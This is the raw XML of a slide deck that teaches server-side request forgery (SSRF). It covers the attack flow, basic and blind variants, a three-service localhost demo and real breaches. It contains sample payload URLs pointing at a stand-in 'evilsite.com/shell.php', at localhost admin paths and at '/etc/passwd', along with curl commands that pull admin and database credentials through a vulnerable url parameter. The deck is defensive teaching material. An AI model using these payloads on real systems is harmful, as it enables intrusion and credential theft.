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b2a55622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b2a55622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b2a55622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b2a55622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b2a55622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b2a55622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b2a55622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b2a55622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dd64e37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dd64e37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2dd64e3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2dd64e3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d908eb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d908eb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d908eb0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d908eb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d908eb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d908eb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4d908eb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4d908eb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dd64e3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dd64e3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4d908eb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4d908eb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4b2a55622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4b2a55622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4b2a55622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4b2a55622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4b2a55622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4b2a55622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4b2a55622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4b2a55622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2dd64e3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2dd64e3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2dd64e3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2dd64e3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dd64e3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dd64e3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4b2a55622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4b2a55622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b2a55622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4b2a55622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b2a55622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b2a55622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4b2a55622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4b2a55622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b2a55622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b2a55622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b2a55622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4b2a55622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dd64e3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dd64e3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b2a55622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b2a55622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b2a55622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b2a55622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b2a55622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b2a55622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heatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/document/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM/edit" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c2797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xyz.com/id?content=dashboard.php" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://xyz.com/id?content=https://evilsite.com/shell.php" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://xyz.com/id?content=http://localhost/administrator" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://xyz.com/id?content=file:///etc/passw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300"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="4300"/>
              <a:t>SSRF</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4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By Amanjot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flipH="1" rot="-5400000">
            <a:off x="-1188900" y="2715650"/>
            <a:ext cx="37137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Overview of a SSRF common flow</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="186" name="Google Shape;186;p22"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1202700" y="154975"/>
            <a:ext cx="7169600" cy="4874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600"/>
              <a:t>Why is server-side request forgery dangerous?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="2600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="192" name="Google Shape;192;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1297500" y="183177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While many web vulnerabilities directly affect the target system, SSRF allows attackers to use the target as an intermediary that passes requests to a third system.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So while an SSRF attack might not be damaging in itself, it can provide malicious hackers with access to internal systems that were never supposed to be accessible from the Internet. There are several reasons why this is dangerous.</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>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Steps to conduct </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2600"/>
              <a:t>SSRF</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="198" name="Google Shape;198;p24"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1297500" y="1056676"/>
            <a:ext cx="7038900" cy="3462850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="199" name="Google Shape;199;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3072000" y="4615150"/>
            <a:ext cx="3000000" cy="45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55">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>(1)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00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Steps to conduct SSRF</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="205" name="Google Shape;205;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1297500" y="929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AutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900"/>
              <a:t>The attacker sends a forged request to a web server that is vulnerable to SSRF that resides on the same internal network as the target server.</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The vulnerable web server sends the attacker-controlled request to the victim’s server, bypassing the firewall.</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The victim’s server responds to the web server with the requested data.</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If the specific SSRF vulnerability permits it, the data is sent back to the attacker. In most cases, the attacker will need to exfiltrate or infer this information by other means (out-of-band).										</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1755">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>(2)</a:t>
            </a:r>
            <a:endParaRPr b="1"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6"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="152400"/>
            <a:ext cx="8829300" cy="4838700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="211" name="Google Shape;211;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="372950" y="279700"/>
            <a:ext cx="203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Example:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:latin typeface="Lato"/>
              <a:ea typeface="Lato"/>
              <a:cs typeface="Lato"/>
              <a:sym typeface="Lato"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="212" name="Google Shape;212;p26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7443325" y="310775"/>
            <a:ext cx="1383000" cy="55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00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Types of </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2600"/>
              <a:t>SSRF attacks</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="218" name="Google Shape;218;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1297500" y="929700"/>
            <a:ext cx="7038900" cy="398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b="1" lang="en" sz="2000"/>
              <a:t>Basic Server Side Request Forgery </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900"/>
              <a:t>occurs when the attacker actually receives back the response to the SSRF payload, meaning that the request loop closes back to the attacker. This type of attack is able to perform read and write operations.</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b="1" lang="en" sz="2000"/>
              <a:t>Blind Server Side Request Forgery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900"/>
              <a:t> exploits do not return a response to the attacker. Because of this open-loop, read operations are not immediate, but blind attacks can be used easily to conduct write operations for which the attacker does not need to see the response.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EXAMPLE</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="224" name="Google Shape;224;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1297500" y="1427700"/>
            <a:ext cx="7038900" cy="342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F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>or demo purpose, suppose we have 3 services.</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t>public-web-service : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>This service is exposed on internet. Running on port 8080</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="50000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t>internal-user-service :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t> This service is not exposed to internet but the resources can be accessible by public web server . Running on port 8081</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="50000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t>internal-admin-service : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>This service is not exposed to internet. Attacker will try to access this service and retrive sensitive data by ssrf attack. Running on port 8083</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>(1)</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77700" y="124325"/>
            <a:ext cx="8981699" cy="4879324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="230" name="Google Shape;230;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="217550" y="310775"/>
            <a:ext cx="18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Architecture:</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Lato"/>
              <a:ea typeface="Lato"/>
              <a:cs typeface="Lato"/>
              <a:sym typeface="Lato"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="231" name="Google Shape;231;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6681900" y="4572550"/>
            <a:ext cx="574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600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>(2)</a:t>
            </a:r>
            <a:endParaRPr>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EXAMPLE</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="237" name="Google Shape;237;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1297500" y="1427700"/>
            <a:ext cx="7038900" cy="342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80"/>
              <a:t>To explain the impact, consider that the web  server we’re running with our                 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1580"/>
              <a:t>(IP address 10.0.0.3)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1580"/>
              <a:t> is within a network with another server: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1580"/>
              <a:t>internal-admin-service (IP address 10.0.0.2)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1580"/>
              <a:t>. The internal-admin-service server serves a site on port 8083 without any authentication. The router (10.0.0.1) routes all the internal traffic to the internet. For this example, there aren’t any firewall rules for traffic between internal servers.</a:t>
            </a:r>
            <a:endParaRPr sz="1580"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1018"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1580"/>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1580"/>
              <a:t> internal-admin-service server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1580"/>
              <a:t> cannot be reached from the internet. The </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1580"/>
              <a:t>public web server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1580"/>
              <a:t> can be reached at web-server.com.</a:t>
            </a:r>
            <a:endParaRPr sz="1580"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1018"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1580"/>
              <a:t>We know that our web server, 10.0.0.3, processes the requests we send to it. Now let’s see what happens when we request the internal-admin-service server through the web server:</a:t>
            </a:r>
            <a:endParaRPr sz="1580"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>(3)</a:t>
            </a:r>
            <a:endParaRPr sz="158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EXAMPLE</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="243" name="Google Shape;243;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1297500" y="1427700"/>
            <a:ext cx="7326900" cy="342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679"/>
              <a:t>Attack Details :	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1580"/>
              <a:t>Attacker will try to scan multiple ports via changing port number in url like below and he founds 8083 is reachable port. He will try to get adminDetail using below endpoint.</a:t>
            </a:r>
            <a:endParaRPr sz="1580"/>
          </a:p>
          <a:p>
            <a:pPr indent="-328930" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1580"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1580"/>
              <a:t>Admin Details</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1580"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1018"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1580">
                <a:highlight>
                  <a:srgbClr val="E06666"/>
                </a:highlight>
              </a:rPr>
              <a:t>curl http://localhost:8080/api/users?url=http://localhost:8083/api/adminDetail</a:t>
            </a:r>
            <a:endParaRPr sz="1580">
              <a:highlight>
                <a:srgbClr val="E06666"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1018"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1679"/>
              <a:t>Response : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1580">
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
              </a:rPr>
              <a:t>{'username':'admin','password':'OhMyGod@123'}</a:t>
            </a:r>
            <a:endParaRPr sz="1580">
              <a:highlight>
                <a:schemeClr val="dk1"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-328930" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1580"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1580"/>
              <a:t>Db Sensitive Details</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1580"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1018"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1580">
                <a:highlight>
                  <a:srgbClr val="E06666"/>
                </a:highlight>
              </a:rPr>
              <a:t>curl http://localhost:8080/api/users?url=http://localhost:8083/api/dbDetail</a:t>
            </a:r>
            <a:endParaRPr sz="1580">
              <a:highlight>
                <a:srgbClr val="E06666"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1018"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1679"/>
              <a:t>Response : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1580">
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
              </a:rPr>
              <a:t>{'dbName':'controller','host':'10.0.1.35','username':'root', 'password':'XSuper@#12345', 'port':'5432'}</a:t>
            </a:r>
            <a:endParaRPr sz="1580">
              <a:highlight>
                <a:schemeClr val="dk1"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>(4)</a:t>
            </a:r>
            <a:endParaRPr sz="1580">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152400" y="152400"/>
            <a:ext cx="8798225" cy="4804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EXAMPLE</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="249" name="Google Shape;249;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1056675" y="1070300"/>
            <a:ext cx="7723200" cy="3420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679"/>
              <a:t>Since the public web server can actually reach 10.0.0.2, the internal internal-admin-service server, it’ll send an HTTP request to it and then reflect the response to the outside world. You could compare it to a web proxy, but abused to proxy external traffic to internal services and vica versa.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1679"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1018"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1679"/>
              <a:t>In a internal user service, we have a userdetails endpoint which will provide user related basic information.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1679"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1018"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1679"/>
              <a:t>3. Get User Information</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1679"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1018"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1679">
                <a:highlight>
                  <a:srgbClr val="E06666"/>
                </a:highlight>
              </a:rPr>
              <a:t>curl http://localhost:8080/api/users?url=http://localhost:8081/api/userDetail/0</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1679">
              <a:highlight>
                <a:srgbClr val="E06666"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1018"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1679"/>
              <a:t>Response</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1679"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1018"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1679"/>
              <a:t>{'name':'User-0','id':'0'}</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1679"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1018"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1679"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>(5)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1679"/>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00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Recent </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2600"/>
              <a:t>SSRF attacks</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="255" name="Google Shape;255;p33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1297500" y="929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AutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1900"/>
              <a:t>Capital One : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900"/>
              <a:t>One of the largest banks in the United States was just fined $80 million for a massive data breach – a 2019 incident which exposed personal data of 100 million Americans and six million Canadians.</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Microsoft : On Tuesday, March 2nd 2021,  Microsoft announced an MS Exchange server vulnerability, that was being exploited to perpetrate an active server side request forgery (SSRF) attack.</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900"/>
